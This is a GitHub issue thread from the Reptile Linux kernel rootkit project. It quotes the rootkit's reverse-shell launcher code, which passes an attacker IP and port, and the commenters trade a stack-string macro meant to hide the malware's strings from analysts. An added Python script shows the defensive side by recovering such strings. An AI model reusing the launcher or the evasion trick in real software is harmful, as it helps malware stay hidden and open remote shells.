f0rb1dd3n / Reptile

LKM Linux rootkit

Memory leak #21

Closed milabs closed 6 years ago

milabs commented 6 years ago

void shell_execer(struct work_struct *work) {
        struct shell_task *task = (struct shell_task *)work;
        char *argv[] = { task->path, "-t", task->ip, "-p", task->port, NULL };

        exec(argv);
        if(task) {
                bzero(task->path, strlen(task->path));   /* <<-- task->path leak */
                bzero(task->ip, strlen(task->ip));       /* <<-- task->{ip,port} leak */
                bzero(task->port, strlen(task->port));
                kfree(task);
        }
}

f0rb1dd3n commented 6 years ago

@milabs,

Thanks for reporting that. You got the point, and I will fix it. But I think I have to consider obfuscation in general. Since Reptile doesn't have any obfuscation, just preventing these leaks will not work.

I think there are other leakages like that and some weaknesses in my code. What do you think about it?

milabs commented 6 years ago

What's common in obfuscation and programming bugs?

f0rb1dd3n commented 6 years ago

If I want to prevent memory leaks, I have to obfuscate strings first too, because someone can retrieve information just by searching for strings in the binary.

milabs commented 6 years ago

// echo -ne 'helloworld\n' | hexdump -ve '"%08x\n"'
#define STR$helloworld \
({ \
 unsigned int *p = (unsigned int *)__builtin_alloca( 3 * 4 ); \
 p[0] = 0x6c6c6568; \
 p[1] = 0x726f776f; \
 p[2] = 0x000a646c; \
 (char *)p; \
})
...
printf(STR$helloworld);

Catch the idea and don't forget to credit me.
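
Seen from the analyst's side, a string built this way no longer shows up as one run in a plain `strings` search, but the dword stores can be stitched back together. The following is an added example, not part of the thread or of Reptile's code: it assumes x86-64 and only the `mov dword [reg+disp8], imm32` encodings listed in the comment (it also covers `rbp`/`rsp` bases, beyond the macro's single case), and the function name and sample bytes are constructed for illustration.

```python
import re
import struct

# x86-64 "mov dword [base+disp8], imm32" (opcode C7 /0), the stores a compiler
# typically emits for p[0] = 0x6c6c6568; p[1] = ...:
#   C7 00 imm32 -> [rax]        C7 40 d8 imm32 -> [rax+d8]
#   C7 45 d8 imm32 -> [rbp+d8]  C7 44 24 d8 imm32 -> [rsp+d8]
STORE = re.compile(
    rb"\xc7(?:(?P<b0>\x00)|(?P<b1>\x40|\x45|\x44\x24)(?P<d>.))(?P<imm>.{4})",
    re.DOTALL)
BASES = {b"\x00": "rax", b"\x40": "rax", b"\x45": "rbp", b"\x44\x24": "rsp"}

def recover_stack_strings(code: bytes, min_len: int = 4) -> list:
    """Heuristic: join imm32 stores to consecutive offsets of one base register."""
    runs, cur, prev = [], b"", None
    for m in STORE.finditer(code):
        base = BASES[m["b0"] or m["b1"]]
        disp = struct.unpack("b", m["d"])[0] if m["d"] else 0
        if prev != (base, disp - 4):      # not the next dword: start a new run
            runs.append(cur)
            cur = b""
        cur += m["imm"]                   # imm32 bytes are already in memory order
        prev = (base, disp)
    runs.append(cur)
    found = []
    for raw in runs:
        text = raw.split(b"\x00", 1)[0]   # stop at the NUL terminator, if any
        if len(text) >= min_len and all(32 <= c < 127 or c in (9, 10) for c in text):
            found.append(text.decode("ascii"))
    return found

# Constructed sample (hand-assembled, not taken from any real binary):
SAMPLE = bytes.fromhex(
    "4883ec10" "4889e0"          # sub rsp,16 ; mov rax,rsp
    "c700" "68656c6c"            # mov dword [rax],   0x6c6c6568
    "c74004" "6f776f72"          # mov dword [rax+4], 0x726f776f
    "c74008" "6c640a00"          # mov dword [rax+8], 0x000a646c
    "4889c7" "c3")               # mov rdi,rax ; ret

if __name__ == "__main__":
    print(b"helloworld" in SAMPLE)          # contiguous string is absent
    print(recover_stack_strings(SAMPLE))
```

Because it pattern-matches raw bytes instead of disassembling, treat hits as leads to confirm in a disassembler.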

f0rb1dd3n commented 6 years ago

Thanks bro,

That's the point. I will consider making all those improvements. And don't worry about credits. Thx

f0rb1dd3n commented 6 years ago

fixed in ed2ce1d